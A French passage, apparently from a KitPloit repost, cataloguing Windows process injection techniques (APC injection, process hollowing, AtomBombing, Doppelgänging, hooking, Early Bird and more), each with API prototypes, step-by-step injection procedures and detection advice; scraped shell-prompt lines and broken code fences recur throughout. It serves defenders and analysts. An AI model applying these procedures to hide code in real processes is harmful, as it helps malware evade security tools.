  3. Ouvrir le processus cible avec OpenProcess
  4. Allouer de la mémoire dans le processus cible avec VirtualAllocEx
  5. Copier le contenu de la DLL dans la mémoire allouée avec WriteProcessMemory
  6. Effectuer le chargement manuel et la relocalisation de la DLL dans le processus cible
  • Analyser les en-têtes PE
  • Allouer de la mémoire pour chaque section
  • Copier les sections dans la mémoire allouée
  • Traiter la table de relocalisation :
    • Énumérer les entrées de relocalisation
    • Appliquer les relocalisations en fonction de la nouvelle adresse de base
  • Résoudre les imports :
    • Parcourir le répertoire des imports
    • Pour chaque fonction importée, résoudre son adresse à l'aide de GetProcAddress
    • Écrire les adresses résolues dans l'IAT
  1. Exécuter le point d'entrée de la DLL à l'aide de l'une des méthodes de création de thread

Détection et défense :

  • Implémenter des techniques avancées d'analyse de la mémoire pour détecter le code injecté
  • Utiliser la détection comportementale pour identifier les schémas suspects d'allocation mémoire
  • Surveiller les opérations inhabituelles de mappage de fichiers
  • Employer des méthodes de détection heuristiques pour identifier les chargeurs réflexifs

4. Injection APC

Cette technique permet l'exécution de code dans un thread spécifique en s'attachant à une file d'appels de procédure asynchrones (APC). Elle fonctionne mieux avec les threads alertables (ceux qui appellent des fonctions d'attente alertables).

API clés :

  • CreateToolhelp32Snapshot ```c HANDLE CreateToolhelp32Snapshot( DWORD dwFlags, DWORD th32ProcessID );
    root@kitploit:~
  • Process32First ```c BOOL Process32First( HANDLE hSnapshot, LPPROCESSENTRY32 lppe );
    root@kitploit:~
  • Process32Next ```c BOOL Process32Next( HANDLE hSnapshot, LPPROCESSENTRY32 lppe );
    root@kitploit:~
  • Thread32First ```c BOOL Thread32First( HANDLE hSnapshot, LPTHREADENTRY32 lpte );
    root@kitploit:~
  • Thread32Next ```c BOOL Thread32Next( HANDLE hSnapshot, LPTHREADENTRY32 lpte );
    root@kitploit:~
  1. Créer un instantané des processus système avec CreateToolhelp32Snapshot
  2. Énumérer les processus et les threads à l'aide de Process32First, Process32Next, Thread32First et Thread32Next
  3. Ouvrir le processus cible avec OpenProcess
  4. Allouer de la mémoire dans le processus cible avec VirtualAllocEx
  5. Écrire le code malveillant dans la mémoire allouée avec WriteProcessMemory
  6. Mettre un APC en file d'attente sur le thread cible avec QueueUserAPC, en pointant vers le code injecté

Détection et défense :

  • Surveiller les opérations suspectes de mise en file d'attente d'APC
  • Implémenter une surveillance de l'exécution des threads pour détecter une exécution de code inattendue
  • Utiliser des solutions EDR capables de détecter les abus d'APC
  • Employer une analyse dynamique pour identifier un comportement inhabituel des threads

5. Process Hollowing (Process Replacement)

Cette technique « vide » l'intégralité du contenu d'un processus et y insère du contenu malveillant.

API clés :

  • CreateProcess ```c BOOL CreateProcessA( LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation );
    root@kitploit:~

NtQueryInformationProcess (Non documenté) ```c NTSTATUS NTAPI NtQueryInformationProcess( IN HANDLE ProcessHandle, IN PROCESSINFOCLASS ProcessInformationClass, OUT PVOID ProcessInformation, IN ULONG ProcessInformationLength, OUT PULONG ReturnLength OPTIONAL );

root@kitploit:~
- [`GetModuleHandle`](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-getmodulehandlea)  ```c
HMODULE GetModuleHandleA(
  LPCSTR lpModuleName
);
  • ZwUnmapViewOfSection / NtUnmapViewOfSection (Non documenté) ```c NTSTATUS NTAPI NtUnmapViewOfSection( IN HANDLE ProcessHandle, IN PVOID BaseAddress );
    root@kitploit:~
  • VirtualAllocEx (voir ci-dessus)
  • WriteProcessMemory (voir ci-dessus)
  • GetThreadContext ```c BOOL GetThreadContext( HANDLE hThread, LPCONTEXT lpContext );
    root@kitploit:~
  • SetThreadContext (voir ci-dessus)
  • ResumeThread (voir ci-dessus)

Procédure :

  1. Créer un nouveau processus dans un état suspendu à l'aide de CreateProcess avec le drapeau CREATE_SUSPENDED
  2. Obtenir les informations du processus à l'aide de NtQueryInformationProcess
  3. Désallouer l'exécutable d'origine du processus à l'aide de NtUnmapViewOfSection, après avoir désalloué l'exécutable d'origine, ajuster l'adresse de base de l'image dans le PEB (Process Environment Block) pour pointer vers la nouvelle mémoire allouée.
  4. Ajuster l'adresse de base de l'image dans le PEB :
  • Utiliser ReadProcessMemory pour lire le PEB
  • Localiser le champ ImageBaseAddress
  • Utiliser WriteProcessMemory pour le mettre à jour avec l'adresse de la mémoire nouvellement allouée
  1. Allouer de la mémoire dans le processus cible avec VirtualAllocEx
  2. Écrire l'exécutable malveillant dans la mémoire allouée avec WriteProcessMemory
  3. Mettre à jour le contexte du thread pour pointer vers le nouveau point d'entrée à l'aide de GetThreadContext et SetThreadContext
  4. Reprendre le thread principal du processus avec ResumeThread

Détection et défense :

  • Mettre en œuvre des vérifications d'intégrité des processus pour détecter les processus évidés
  • Surveiller les modèles de création de processus suspects, en particulier avec le drapeau CREATE_SUSPENDED
  • Utiliser des outils de forensique mémoire pour identifier les signes de processus évidés
  • Employer la détection basée sur le comportement pour identifier les processus présentant des dispositions mémoire inattendues

6. AtomBombing

Une variante de l'injection APC qui fonctionne en divisant la charge utile malveillante en chaînes distinctes et en utilisant des atomes. Cette technique repose sur le fait que les atomes sont partagés entre les processus.

API clés :

  • OpenThread (voir ci-dessus)
  • GlobalAddAtom ```c ATOM GlobalAddAtomA( LPCSTR lpString );
    root@kitploit:~
  • GlobalGetAtomName ```c UINT GlobalGetAtomNameA( ATOM nAtom, LPSTR lpBuffer, int nSize );
    root@kitploit:~
  • QueueUserAPC (voir ci-dessus)
  • NtQueueApcThread (non documenté, voir ci-dessus)
  • NtSetContextThread (non documenté) ```c NTSTATUS NTAPI NtSetContextThread( IN HANDLE ThreadHandle, IN PCONTEXT ThreadContext );
    root@kitploit:~

Modèle :

  1. Divisez la charge utile malveillante en petits morceaux
  2. Pour chaque morceau, utilisez GlobalAddAtom pour créer un atome global
  3. Ouvrez le thread cible avec OpenThread
  4. Placez un APC en file d'attente sur le thread cible avec QueueUserAPC ou NtQueueApcThread
  5. Dans la routine APC, utilisez GlobalGetAtomName pour récupérer les morceaux de la charge utile
  6. Assemblez la charge utile dans la mémoire du processus cible
  7. Exécutez la charge utile à l'aide de NtSetContextThread ou en plaçant un autre APC en file d'attente

Détection et défense :

  • Surveillez les schémas inhabituels de création et de récupération d'atomes
  • Implémentez une détection basée sur le comportement pour les processus accédant à un grand nombre d'atomes
  • Utilisez des solutions EDR capables de détecter les techniques AtomBombing
  • Employez l'analyse à l'exécution pour identifier une utilisation suspecte d'APC combinée à une manipulation d'atomes

7. Process Doppelgänging

Une évolution du Process Hollowing qui remplace l'image avant la création du processus. Cette technique exploite le NTFS transactionnel Windows (TxF) pour remplacer temporairement un fichier légitime par un fichier malveillant lors de la création du processus.

API clés :

  • CreateTransaction ```c HANDLE CreateTransaction( LPSECURITY_ATTRIBUTES lpTransactionAttributes, LPGUID UOW, DWORD CreateOptions, DWORD IsolationLevel, DWORD IsolationFlags, DWORD Timeout, LPWSTR Description );
    root@kitploit:~
  • CreateFileTransacted ```c HANDLE CreateFileTransactedA( LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile, HANDLE hTransaction, PUSHORT pusMiniVersion, PVOID lpExtendedParameter );
    root@kitploit:~
  • NtCreateSection (Non documenté) ```c NTSTATUS NTAPI NtCreateSection( OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG SectionPageProtection, IN ULONG AllocationAttributes, IN HANDLE FileHandle OPTIONAL );
    root@kitploit:~
  • NtCreateProcessEx (Non documenté) ```c NTSTATUS NTAPI NtCreateProcessEx( OUT PHANDLE ProcessHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN HANDLE ParentProcess, IN ULONG Flags, IN HANDLE SectionHandle OPTIONAL, IN HANDLE DebugPort OPTIONAL, IN HANDLE ExceptionPort OPTIONAL, IN BOOLEAN InJob );
    root@kitploit:~

Procédure :

  1. Créer une transaction avec CreateTransaction
  2. Créer un fichier transactionnel avec CreateFileTransacted
  3. Écrire la charge utile malveillante dans le fichier transactionnel
  4. Créer une section pour le fichier transactionnel avec NtCreateSection
  5. Créer un processus à partir de la section avec NtCreateProcessEx
  6. Créer un thread dans le nouveau processus avec NtCreateThreadEx
  7. Annuler la transaction avec RollbackTransaction pour supprimer les traces du fichier malveillant

Détection et défense :

  • Surveiller les opérations NTFS transactionnelles suspectes
  • Mettre en place une surveillance de l'intégrité des fichiers pour détecter les remplacements temporaires de fichiers
  • Utiliser des solutions EDR avancées capables de détecter les techniques de Process Doppelgänging
  • Utiliser une détection comportementale pour identifier les processus créés à partir de fichiers transactionnels

8. Process Herpaderping

Semblable au Process Doppelgänging, mais exploite l'ordre de création du processus et des contrôles de sécurité. Cette technique exploite le fait que Windows effectue des contrôles de sécurité sur le fichier exécutable avant de commencer à exécuter le processus.

API clés :

  • CreateFile ```c HANDLE CreateFileA( LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile );
    root@kitploit:~
  • NtCreateSection (non documenté, voir ci-dessus)
  • NtCreateProcessEx (non documenté, voir ci-dessus)
  • NtCreateThreadEx (non documenté, voir ci-dessus)

Modèle :

  1. Créez un fichier avec CreateFile
  2. Écrivez la charge utile malveillante dans le fichier
  3. Créez une section pour le fichier à l'aide de NtCreateSection
  4. Remplacez le contenu du fichier par des données bénignes
  5. Créez un processus à partir de la section à l'aide de NtCreateProcessEx
  6. Créez un thread dans le nouveau processus avec NtCreateThreadEx

Détection et défense :

  • Mettez en place une surveillance de l'intégrité des fichiers pour détecter les changements rapides dans les fichiers exécutables
  • Utilisez la détection comportementale pour identifier les processus dont le contenu des fichiers ne correspond pas
  • Utilisez des solutions EDR avancées capables de détecter les techniques de Process Herpaderping
  • Surveillez les schémas suspects de création, de modification de fichiers et de création de processus

9. Injection par hooking

Cette technique utilise des fonctions liées au hooking pour injecter une DLL malveillante. Elle peut également être utilisée pour le hooking d'API, et pas seulement pour l'injection.

API clés :

  • SetWindowsHookEx ```c HHOOK SetWindowsHookExA( int idHook, HOOKPROC lpfn, HINSTANCE hmod, DWORD dwThreadId );
    root@kitploit:~
  • PostThreadMessage ```c BOOL PostThreadMessageA( DWORD idThread, UINT Msg, WPARAM wParam, LPARAM lParam );
    root@kitploit:~

Modèle :

  1. Créez une DLL contenant la procédure de hook
  2. Utilisez SetWindowsHookEx pour installer un hook dans le processus cible
  3. Déclenchez le hook en envoyant un message avec PostThreadMessage

Détection et défense :

  • Surveillez les utilisations suspectes de SetWindowsHookEx, en particulier avec les hooks globaux
  • Mettez en œuvre des mécanismes de détection de l'API hooking
  • Utilisez des solutions EDR capables de détecter des installations de hooks anormales
  • Recourez à la détection comportementale pour identifier les processus avec des modules chargés inattendus

10. Injection par mémoire supplémentaire Windows

Cette technique injecte du code dans un processus en utilisant la mémoire supplémentaire de Windows (EWM), qui est ajoutée à l'instance d'une classe lors de l'enregistrement de la classe de fenêtre. Elle est moins courante et peut être détectée par certaines solutions de sécurité.

API clés :

  • FindWindowA ```c HWND FindWindowA( LPCSTR lpClassName, LPCSTR lpWindowName );
    root@kitploit:~

GetWindowThreadProcessId ```c DWORD GetWindowThreadProcessId( HWND hWnd, LPDWORD lpdwProcessId );

root@kitploit:~
- `OpenProcess` (voir ci-dessus)
- `VirtualAllocEx` (voir ci-dessus)
- `WriteProcessMemory` (voir ci-dessus)
- [`SetWindowLongPtrA`](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowlongptra)  ```c
LONG_PTR SetWindowLongPtrA(
  HWND     hWnd,
  int      nIndex,
  LONG_PTR dwNewLong
);
  • SendNotifyMessage ```c BOOL SendNotifyMessageA( HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam );
    root@kitploit:~

Modèle :

  1. Trouvez la fenêtre cible avec FindWindowA
  2. Obtenez l'ID du processus de la fenêtre avec GetWindowThreadProcessId
  3. Ouvrez le processus avec OpenProcess
  4. Allouez de la mémoire dans le processus cible avec VirtualAllocEx
  5. Écrivez le code malveillant dans la mémoire allouée avec WriteProcessMemory
  6. Utilisez SetWindowLongPtrA pour modifier la mémoire supplémentaire de la fenêtre
  7. Déclenchez l'exécution avec SendNotifyMessage

Détection et défense :

  • Surveillez les modifications suspectes des propriétés de la fenêtre
  • Implémentez des contrôles d'intégrité pour les données de classe de fenêtre
  • Utilisez des solutions EDR capables de détecter les manipulations EWM
  • Employez une détection basée sur le comportement pour identifier les processus présentant des changements inattendus dans les propriétés de la fenêtre

11. Injection par propagation

Cette technique est utilisée pour injecter du code malveillant dans des processus de niveau d'intégrité moyen, comme explorer.exe. Elle fonctionne en énumérant les fenêtres et en les sous-classant. peut être particulièrement efficace pour l'élévation de privilèges.

API clés :

  • EnumWindows ```c BOOL EnumWindows( WNDENUMPROC lpEnumFunc, LPARAM lParam );
    root@kitploit:~
  • EnumChildWindows ```c BOOL EnumChildWindows( HWND hWndParent, WNDENUMPROC lpEnumFunc, LPARAM lParam );
    root@kitploit:~

EnumProps ```c int EnumPropsA( HWND hWnd, PROPENUMPROCA lpEnumFunc );

root@kitploit:~
- [`GetProp`](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getpropa)  ```c
HANDLE GetPropA(
  HWND    hWnd,
  LPCSTR lpString
);
  • SetWindowSubclass ```c BOOL SetWindowSubclass( HWND hWnd, SUBCLASSPROC pfnSubclass, UINT_PTR uIdSubclass, DWORD_PTR dwRefData );
    root@kitploit:~
  • FindWindow (voir ci-dessus)
  • FindWindowEx (voir ci-dessus)
  • GetWindowThreadProcessId (voir ci-dessus)
  • OpenProcess (voir ci-dessus)
  • ReadProcessMemory (voir ci-dessus)
  • VirtualAllocEx (voir ci-dessus)
  • WriteProcessMemory (voir ci-dessus)
  • SetPropA ```c BOOL SetPropA( HWND hWnd, LPCSTR lpString, HANDLE hData );
    root@kitploit:~

PostMessage ```c BOOL PostMessageA( HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam );

root@kitploit:~
Template:
1. Énumérez les fenêtres à l'aide de `EnumWindows` et `EnumChildWindows`
2. Pour chaque fenêtre, recherchez les fenêtres sous-classées à l'aide de `EnumProps` et `GetProp`
3. Ouvrez le processus cible avec `OpenProcess`
4. Allouez de la mémoire dans le processus cible avec `VirtualAllocEx`
5. Écrivez le code malveillant dans la mémoire allouée avec `WriteProcessMemory`
6. Sous-classez la fenêtre à l'aide de `SetWindowSubclass`
7. Définissez une nouvelle propriété avec `SetPropA` pour stocker la charge utile
8. Déclenchez l'exécution en envoyant un message avec `PostMessage`

Detection and Defense:
- Surveillez les schémas suspects d'énumération et de sous-classement de fenêtres
- Implémentez des contrôles d'intégrité pour le sous-classement de fenêtres
- Utilisez des solutions EDR capables de détecter les techniques d'injection par propagation
- Employez la détection basée sur le comportement pour identifier les processus présentant des modifications inattendues du sous-classement de fenêtres

## 12. Heap Spray

Bien qu'il ne s'agisse pas strictement d'une technique d'injection, le heap spraying est souvent utilisé en conjonction avec d'autres méthodes d'injection pour faciliter la livraison de la charge utile d'un exploit. Les navigateurs et systèmes d'exploitation modernes ont implémenté des mesures d'atténuation contre cela.

Key APIs:
- [`HeapAlloc`](https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapalloc)  ```c
LPVOID HeapAlloc(
  HANDLE hHeap,
  DWORD  dwFlags,
  SIZE_T dwBytes
);

VirtualAlloc ```c LPVOID VirtualAlloc( LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );

root@kitploit:~
Template:
1. Allouer plusieurs blocs mémoire à l'aide de `HeapAlloc` ou `VirtualAlloc`
2. Remplir ces blocs avec une combinaison de NOP sleds et du payload
3. Répéter ce processus pour couvrir une grande partie de l'espace d'adressage du processus

Detection and Defense:
- Mettre en place une surveillance des allocations mémoire pour détecter des schémas suspects
- Utiliser la randomisation de l'espace d'adressage (ASLR) pour atténuer les attaques par heap spraying
- Employer des solutions EDR capables de détecter les techniques de heap spraying
- Mettre en œuvre des atténuations spécifiques au navigateur, telles que la randomisation de l'allocation du tas

## 13. Détournement de l'exécution d'un thread

Cette technique consiste à suspendre un thread légitime dans un processus cible, à modifier son contexte d'exécution pour pointer vers du code malveillant, puis à reprendre le thread, la sauvegarde et la restauration du contexte d'origine du thread étant nécessaires pour maintenir la stabilité du processus.

Key APIs:
- `OpenThread` (voir ci-dessus)
- `SuspendThread` (voir ci-dessus)
- `GetThreadContext` (voir ci-dessus)
- `SetThreadContext` (voir ci-dessus)
- `VirtualAllocEx` (voir ci-dessus)
- `WriteProcessMemory` (voir ci-dessus)
- `ResumeThread` (voir ci-dessus)

Template:
1. Ouvrir le thread cible avec `OpenThread`
2. Suspendre le thread avec `SuspendThread`
3. Obtenir le contexte du thread avec `GetThreadContext`
4. Allouer de la mémoire dans le processus cible avec `VirtualAllocEx`
5. Écrire le code malveillant dans la mémoire allouée avec `WriteProcessMemory`
6. Modifier le contexte du thread pour pointer vers le code injecté avec `SetThreadContext`
7. Reprendre le thread avec `ResumeThread`

Detection and Defense:
- Surveiller les schémas suspects de suspension et de reprise de threads
- Mettre en place une surveillance de l'exécution des threads pour détecter des changements inattendus dans le flux d'exécution
- Utiliser des solutions EDR capables de détecter les techniques de détournement de threads
- Recourir à l'analyse dynamique pour identifier un comportement anormal des threads

## 14. Module Stomping

Cette technique consiste à écraser la mémoire d'un module légitime dans le processus cible avec du code malveillant, contournant potentiellement certaines vérifications de sécurité, et pouvant être détectée par des contrôles d'intégrité sur les modules chargés.

Key APIs:
- [`GetModuleInformation`](https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-getmoduleinformation)  ```c
BOOL GetModuleInformation(
  HANDLE       hProcess,
  HMODULE      hModule,
  LPMODULEINFO lpmodinfo,
  DWORD        cb
);

VirtualProtectEx ```c BOOL VirtualProtectEx( HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect );

root@kitploit:~
- `WriteProcessMemory` (voir ci-dessus)

Modèle :
1. Ouvrez le processus cible avec `OpenProcess`
2. Obtenez des informations sur le module cible à l'aide de `GetModuleInformation`
3. Modifiez la protection mémoire du module pour le rendre accessible en écriture à l'aide de `VirtualProtectEx`
4. Écrasez la section de code du module avec un code malveillant à l'aide de `WriteProcessMemory`
5. Restaurez la protection mémoire d'origine avec `VirtualProtectEx`

Détection et défense :
- Implémentez des contrôles d'intégrité des modules pour détecter les modifications apportées aux modules chargés
- Utilisez des solutions EDR capables de détecter les techniques de module stomping
- Employez des outils de forensic mémoire pour identifier les signes de module stomping
- Implémentez des mécanismes de signature et de vérification de code pour les modules chargés

## 15. Hooking de l'IAT

Cette technique modifie la table d'adresses d'importation (IAT) d'un processus pour rediriger les appels de fonctions vers un code malveillant. Elle peut être détectée en comparant les entrées de l'IAT avec les adresses réelles des fonctions dans les DLL cibles.

API clés :
- [`GetProcAddress`](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-getprocaddress)  ```c
FARPROC GetProcAddress(
  HMODULE hModule,
  LPCSTR  lpProcName
);
  • VirtualProtect ```c BOOL VirtualProtect( LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect );
    root@kitploit:~

Modèle :

  1. Localisez l'IAT du processus cible
  2. Identifiez la fonction à hooker
  3. Modifiez la protection mémoire de l'IAT pour la rendre accessible en écriture à l'aide de VirtualProtect
  4. Remplacez l'adresse de la fonction d'origine par l'adresse de la fonction malveillante
  • Calculez l'adresse de l'entrée IAT pour la fonction cible
  • Lisez l'adresse de la fonction d'origine depuis l'entrée IAT
  • Remplacez l'adresse de la fonction d'origine par l'adresse de la fonction malveillante
  1. Restaurez la protection mémoire d'origine

Détection et défense :

  • Mettez en œuvre des contrôles d'intégrité de l'IAT pour détecter les modifications
  • Utilisez des solutions EDR capables de détecter le hooking d'IAT
  • Employez une analyse à l'exécution pour identifier les redirections de fonctions inattendues
  • Mettez en œuvre des mécanismes de signature de code et de vérification pour les modules chargés

16. Inline Hooking

Cette technique modifie les premières instructions d'une fonction pour rediriger l'exécution vers un code malveillant. Elle nécessite une gestion prudente des instructions multi-octets et des sauts relatifs.

APIs clés :

  • VirtualProtect (voir ci-dessus)
  • memcpy ```c void *memcpy( void *dest, const void *src, size_t count );
    root@kitploit:~

Procédure :

  1. Localiser la fonction cible en mémoire
  2. Modifier la protection mémoire pour la rendre accessible en écriture à l'aide de VirtualProtect
  3. Sauvegarder les instructions d'origine (généralement 5 octets ou plus)
  4. Écraser le début de la fonction avec un saut vers le code malveillant
  5. Dans le code malveillant, exécuter les instructions d'origine sauvegardées, puis revenir par un saut à la fonction d'origine

Détection et défense :

  • Mettre en œuvre des contrôles d'intégrité des fonctions pour détecter les modifications des prologues de fonctions
  • Utiliser des solutions EDR capables de détecter le hooking inline
  • Recourir à l'analyse à l'exécution pour identifier les changements inattendus dans le flux d'exécution des fonctions
  • Mettre en œuvre des mécanismes de signature de code et de vérification pour les modules chargés

17. Injection par débogueur

Cette technique utilise des API de débogage pour injecter du code dans un processus cible. Elle peut être détectée par des vérifications anti-débogage dans le processus cible.

API clés :

  • DebugActiveProcess ```c BOOL DebugActiveProcess( DWORD dwProcessId );
    root@kitploit:~
  • WaitForDebugEvent ```c BOOL WaitForDebugEvent( LPDEBUG_EVENT lpDebugEvent, DWORD dwMilliseconds );
    root@kitploit:~
  • ContinueDebugEvent ```c BOOL ContinueDebugEvent( DWORD dwProcessId, DWORD dwThreadId, DWORD dwContinueStatus );
    root@kitploit:~

Template :

  1. Attachez-vous au processus cible en tant que débogueur à l'aide de DebugActiveProcess
  2. Attendez les événements de débogage avec WaitForDebugEvent
  3. Lorsqu'un événement approprié se produit, injectez le code malveillant à l'aide de WriteProcessMemory
  4. Modifiez le contexte du thread pour exécuter le code injecté
  5. Continuez l'événement de débogage avec ContinueDebugEvent

Détection et défense :

  • Implémentez des techniques anti-débogage dans les applications sensibles
  • Surveillez toute utilisation suspecte des API de débogage
  • Utilisez des solutions EDR capables de détecter l'injection basée sur un débogueur
  • Employez l'analyse d'exécution pour identifier les événements de débogage inattendus

18. Détournement de COM

Cette technique consiste à remplacer des objets COM légitimes par des objets malveillants afin d'exécuter du code lorsque l'objet COM est instancié. Utilisée pour la persistance, pas seulement pour l'injection.

API clés :

  • CoCreateInstance ```c HRESULT CoCreateInstance( REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID *ppv );
    root@kitploit:~
  • RegOverridePredefKey ```c LSTATUS RegOverridePredefKey( HKEY hKey, HKEY hNewHKey );
    root@kitploit:~

Modèle :

  1. Créer un objet COM malveillant
  2. Modifier le registre pour remplacer le CLSID d'un objet COM légitime par celui de l'objet malveillant
  3. Lorsque l'application appelle CoCreateInstance, l'objet malveillant sera instancié à la place

Détection et défense :

  • Mettre en œuvre des contrôles d'intégrité des objets COM
  • Surveiller les modifications suspectes du registre liées aux objets COM
  • Utiliser la liste blanche d'applications pour empêcher le chargement d'objets COM non autorisés
  • Employer une détection basée sur le comportement pour identifier l'instanciation inattendue d'objets COM

19. Hollowing de DLL fantôme (Phantom DLL Hollowing)

Cette technique consiste à créer une nouvelle section dans une DLL légitime et à y injecter du code.

API clés :

  • LoadLibraryEx ```c HMODULE LoadLibraryExA( LPCSTR lpLibFileName, HANDLE hFile, DWORD dwFlags );
    root@kitploit:~
  • VirtualAlloc ```c LPVOID VirtualAlloc( LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );
    root@kitploit:~
  • VirtualProtect ```c BOOL VirtualProtect( LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect );
    root@kitploit:~

Template:

  1. Charger une DLL légitime à l’aide de LoadLibraryEx avec le drapeau DONT_RESOLVE_DLL_REFERENCES
  2. Allouer une nouvelle section mémoire à l’aide de VirtualAlloc
  3. Copier le code malveillant dans la nouvelle section
  4. Modifier les en-têtes PE de la DLL pour inclure la nouvelle section
  5. Changer la protection mémoire de la nouvelle section à l’aide de VirtualProtect
  6. Exécuter le code injecté

Détection et défense :

  • Implémenter des contrôles d’intégrité des DLL pour détecter les modifications
  • Surveiller les schémas suspects de chargement de DLL et d’allocation mémoire
  • Utiliser des solutions EDR capables de détecter le phantom DLL hollowing
  • Employer des outils de mémoire forensique pour identifier les signes de manipulation de DLL

20. PROPagate

Cette technique abuse des fonctions API Windows SetProp/GetProp pour parvenir à l’exécution de code.

API clés :

  • SetProp ```c BOOL SetPropA( HWND hWnd, LPCSTR lpString, HANDLE hData );
    root@kitploit:~
  • GetProp ```c HANDLE GetPropA( HWND hWnd, LPCSTR lpString );
    root@kitploit:~
  • EnumPropsEx ```c int EnumPropsExW( HWND hWnd, PROPENUMPROCEXW lpEnumFunc, LPARAM lParam );
    root@kitploit:~

Modèle :

  1. Trouver une fenêtre cible à l'aide de FindWindow ou EnumWindows
  2. Allouer de la mémoire pour la charge utile à l'aide de VirtualAllocEx
  3. Écrire la charge utile dans la mémoire allouée à l'aide de WriteProcessMemory
  4. Utiliser SetProp pour définir une propriété sur la fenêtre, avec l'adresse de la charge utile comme valeur de la propriété
  • Créer une procédure de fenêtre personnalisée qui exécute la charge utile
  • Utiliser SetWindowLongPtr pour remplacer la procédure de fenêtre d'origine par la procédure personnalisée
  1. Déclencher l'exécution en amenant la fenêtre à énumérer ses propriétés (par exemple, en envoyant un message qui provoque un redessin)

Détection et défense :

  • Surveiller les modifications suspectes des propriétés de fenêtre
  • Mettre en œuvre des contrôles d'intégrité pour les propriétés de fenêtre
  • Utiliser des solutions EDR capables de détecter les techniques PROPagate
  • Employer la détection basée sur le comportement pour identifier les processus présentant des modifications inattendues des propriétés de fenêtre

21. Early Bird Injection

Cette technique injecte du code dans un processus pendant son initialisation, avant que le thread principal ne commence à s'exécuter.

API clés :

  • CreateProcess ```c BOOL CreateProcessA( LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation );
    root@kitploit:~
  • VirtualAllocEx (voir ci-dessus)
  • WriteProcessMemory (voir ci-dessus)
  • QueueUserAPC (voir ci-dessus)
  • ResumeThread (voir ci-dessus)

Procédure :

  1. Créer un nouveau processus en état suspendu à l'aide de CreateProcess avec l'indicateur CREATE_SUSPENDED
  2. Allouer de la mémoire dans le nouveau processus à l'aide de VirtualAllocEx
  3. Écrire la charge utile dans la mémoire allouée à l'aide de WriteProcessMemory
  4. Mettre en file d'attente un APC sur le thread principal à l'aide de QueueUserAPC, pointant vers la charge utile
  5. Reprendre le thread principal à l'aide de ResumeThread

Détection et défense :

  • Surveiller la création de processus avec l'indicateur CREATE_SUSPENDED
  • Mettre en œuvre une surveillance de l'initialisation des processus pour détecter une exécution de code inattendue
  • Utiliser des solutions EDR dotées de capacités de détection des techniques d'injection Early Bird
  • Employer une détection basée sur le comportement pour identifier les processus présentant des schémas d'initialisation anormaux

22. Injection par Shim

Cette technique exploite le framework de compatibilité des applications Windows pour injecter du code.

API clés :

  • SdbCreateDatabase ```c PDB SdbCreateDatabase( LPCWSTR pwszPath );
    root@kitploit:~
  • SdbWriteDWORDTag ```c BOOL SdbWriteDWORDTag( PDB pdb, TAG tTag, DWORD dwData );
    root@kitploit:~
  • SdbEndWriteListTag ```c BOOL SdbEndWriteListTag( PDB pdb, TAG tTag );
    root@kitploit:~

Modèle:

  1. Créer une base de données de shims à l'aide de SdbCreateDatabase
  2. Écrire les données de shim dans la base de données, y compris le payload et l'application cible
  3. Installer la base de données de shims à l'aide de sdbinst.exe
  4. Le payload sera exécuté lors du lancement de l'application cible

Détection et défense:

  • Surveillez toute création ou installation suspecte de bases de données de shims
  • Mettez en œuvre une surveillance des shims de compatibilité des applications
  • Utilisez des solutions EDR capables de détecter les techniques d'injection basées sur les shims
  • Employez une liste blanche pour les shims approuvés et bloquez les installations de shims non autorisées

23. Injection par mappage

Cette technique utilise des fichiers mappés en mémoire pour injecter du code dans un processus distant.

API clés:

  • CreateFileMapping ```c HANDLE CreateFileMappingA( HANDLE hFile, LPSECURITY_ATTRIBUTES lpFileMappingAttributes, DWORD flProtect, DWORD dwMaximumSizeHigh, DWORD dwMaximumSizeLow, LPCSTR lpName );
    root@kitploit:~
  • MapViewOfFile ```c LPVOID MapViewOfFile( HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow, SIZE_T dwNumberOfBytesToMap );
    root@kitploit:~
